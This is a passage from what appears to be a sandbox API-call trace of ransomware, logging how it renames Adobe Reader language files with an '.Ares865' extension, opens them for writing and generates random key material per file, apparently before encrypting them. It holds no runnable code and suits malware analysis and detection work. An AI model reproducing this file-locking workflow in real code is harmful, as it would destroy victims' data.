dwFlags=0x0) returned 1 [0159.566] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.da_DK.txt" | out: lpString1="DisplayLanguageNames.da_DK.txt") returned="DisplayLanguageNames.da_DK.txt" [0159.566] lstrlenW (lpString="DisplayLanguageNames.da_DK.txt") returned 30 [0159.566] lstrlenW (lpString="Ares865") returned 7 [0159.566] lstrcmpiW (lpString1="_DK.txt", lpString2="Ares865") returned -1 [0159.567] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da_DK.txt.Ares865") returned 115 [0159.567] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da_DK.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da_dk.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da_DK.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da_dk.txt.ares865"), dwFlags=0x1) returned 1 [0159.576] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.da_DK.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.da_dk.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.576] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28018) returned 1 [0159.576] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.577] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.577] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.581] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.582] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.582] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.583] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.de_CH.txt" | out: lpString1="DisplayLanguageNames.de_CH.txt") returned="DisplayLanguageNames.de_CH.txt" [0159.583] lstrlenW (lpString="DisplayLanguageNames.de_CH.txt") returned 30 [0159.583] lstrlenW (lpString="Ares865") returned 7 [0159.583] lstrcmpiW (lpString1="_CH.txt", lpString2="Ares865") returned -1 [0159.583] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_CH.txt.Ares865") returned 115 [0159.583] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_CH.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_ch.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_CH.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_ch.txt.ares865"), dwFlags=0x1) returned 1 [0159.588] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_CH.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_ch.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.588] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29398) returned 1 [0159.589] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.589] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.589] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.593] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.594] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.594] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.595] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.de_DE.txt" | out: lpString1="DisplayLanguageNames.de_DE.txt") returned="DisplayLanguageNames.de_DE.txt" [0159.595] lstrlenW (lpString="DisplayLanguageNames.de_DE.txt") returned 30 [0159.595] lstrlenW (lpString="Ares865") returned 7 [0159.595] lstrcmpiW (lpString1="_DE.txt", lpString2="Ares865") returned -1 [0159.595] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE.txt.Ares865") returned 115 [0159.595] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de.txt.ares865"), dwFlags=0x1) returned 1 [0159.597] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.598] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29480) returned 1 [0159.598] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.599] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.599] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.606] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.607] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.607] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.607] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.de_DE_PREEURO.txt" | out: lpString1="DisplayLanguageNames.de_DE_PREEURO.txt") returned="DisplayLanguageNames.de_DE_PREEURO.txt" [0159.608] lstrlenW (lpString="DisplayLanguageNames.de_DE_PREEURO.txt") returned 38 [0159.608] lstrlenW (lpString="Ares865") returned 7 [0159.608] lstrcmpiW (lpString1="URO.txt", lpString2="Ares865") returned 1 [0159.608] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE_PREEURO.txt.Ares865") returned 123 [0159.608] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de_preeuro.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de_preeuro.txt.ares865"), dwFlags=0x1) returned 1 [0159.610] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.de_DE_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.de_de_preeuro.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.610] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=29478) returned 1 [0159.610] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.611] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.611] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.626] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.627] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.627] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.628] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.el.txt" | out: lpString1="DisplayLanguageNames.el.txt") returned="DisplayLanguageNames.el.txt" [0159.628] lstrlenW (lpString="DisplayLanguageNames.el.txt") returned 27 [0159.628] lstrlenW (lpString="Ares865") returned 7 [0159.628] lstrcmpiW (lpString1=".el.txt", lpString2="Ares865") returned -1 [0159.628] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el.txt.Ares865") returned 112 [0159.628] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el.txt.ares865"), dwFlags=0x1) returned 1 [0159.631] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.631] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28306) returned 1 [0159.631] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.632] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.632] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.638] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.639] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.639] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.640] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.el_GR.txt" | out: lpString1="DisplayLanguageNames.el_GR.txt") returned="DisplayLanguageNames.el_GR.txt" [0159.640] lstrlenW (lpString="DisplayLanguageNames.el_GR.txt") returned 30 [0159.640] lstrlenW (lpString="Ares865") returned 7 [0159.640] lstrcmpiW (lpString1="_GR.txt", lpString2="Ares865") returned -1 [0159.640] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR.txt.Ares865") returned 115 [0159.640] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr.txt.ares865"), dwFlags=0x1) returned 1 [0159.642] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.642] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28306) returned 1 [0159.643] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.643] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.643] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.649] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.649] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.649] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.650] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.el_GR_PREEURO.txt" | out: lpString1="DisplayLanguageNames.el_GR_PREEURO.txt") returned="DisplayLanguageNames.el_GR_PREEURO.txt" [0159.650] lstrlenW (lpString="DisplayLanguageNames.el_GR_PREEURO.txt") returned 38 [0159.650] lstrlenW (lpString="Ares865") returned 7 [0159.650] lstrcmpiW (lpString1="URO.txt", lpString2="Ares865") returned 1 [0159.651] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR_PREEURO.txt.Ares865") returned 123 [0159.651] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR_PREEURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr_preeuro.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr_preeuro.txt.ares865"), dwFlags=0x1) returned 1 [0159.652] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.el_GR_PREEURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.el_gr_preeuro.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.653] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28278) returned 1 [0159.653] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.654] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.654] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.657] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.658] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.658] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.659] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.en_CA.txt" | out: lpString1="DisplayLanguageNames.en_CA.txt") returned="DisplayLanguageNames.en_CA.txt" [0159.659] lstrlenW (lpString="DisplayLanguageNames.en_CA.txt") returned 30 [0159.659] lstrlenW (lpString="Ares865") returned 7 [0159.659] lstrcmpiW (lpString1="_CA.txt", lpString2="Ares865") returned -1 [0159.659] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_CA.txt.Ares865") returned 115 [0159.659] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_CA.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_ca.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_CA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_ca.txt.ares865"), dwFlags=0x1) returned 1 [0159.662] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_CA.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_ca.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.662] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28296) returned 1 [0159.662] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.663] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.663] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.666] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.667] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.667] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.668] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.en_GB.txt" | out: lpString1="DisplayLanguageNames.en_GB.txt") returned="DisplayLanguageNames.en_GB.txt" [0159.668] lstrlenW (lpString="DisplayLanguageNames.en_GB.txt") returned 30 [0159.668] lstrlenW (lpString="Ares865") returned 7 [0159.668] lstrcmpiW (lpString1="_GB.txt", lpString2="Ares865") returned -1 [0159.668] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB.txt.Ares865") returned 115 [0159.668] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb.txt.ares865"), dwFlags=0x1) returned 1 [0159.670] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.670] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28296) returned 1 [0159.670] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.671] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.671] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.674] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.675] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.675] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.676] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.en_GB_EURO.txt" | out: lpString1="DisplayLanguageNames.en_GB_EURO.txt") returned="DisplayLanguageNames.en_GB_EURO.txt" [0159.676] lstrlenW (lpString="DisplayLanguageNames.en_GB_EURO.txt") returned 35 [0159.676] lstrlenW (lpString="Ares865") returned 7 [0159.676] lstrcmpiW (lpString1="URO.txt", lpString2="Ares865") returned 1 [0159.676] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB_EURO.txt.Ares865") returned 120 [0159.676] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB_EURO.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb_euro.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB_EURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb_euro.txt.ares865"), dwFlags=0x1) returned 1 [0159.678] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_GB_EURO.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_gb_euro.txt.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0159.678] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=28296) returned 1 [0159.678] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0159.679] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0159.679] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.683] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0159.683] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0159.683] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0159.684] lstrcpyW (in: lpString1=0x2cce49a, lpString2="DisplayLanguageNames.en_US.txt" | out: lpString1="DisplayLanguageNames.en_US.txt") returned="DisplayLanguageNames.en_US.txt" [0159.684] lstrlenW (lpString="DisplayLanguageNames.en_US.txt") returned 30 [0159.684] lstrlenW (lpString="Ares865") returned 7 [0159.684] lstrcmpiW (lpString1="_US.txt", lpString2="Ares865") returned -1 [0159.684] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US.txt.Ares865") returned 115 [0159.685] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US.txt" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us.txt"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Resource\\Linguistics\\LanguageNames2\\DisplayLanguageNames.en_US.txt.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\resource\\linguistics\\languagenames2\\displaylanguagenames.en_us.txt.ares865"), dwFlags=0x1) returned 1 [0159.687] 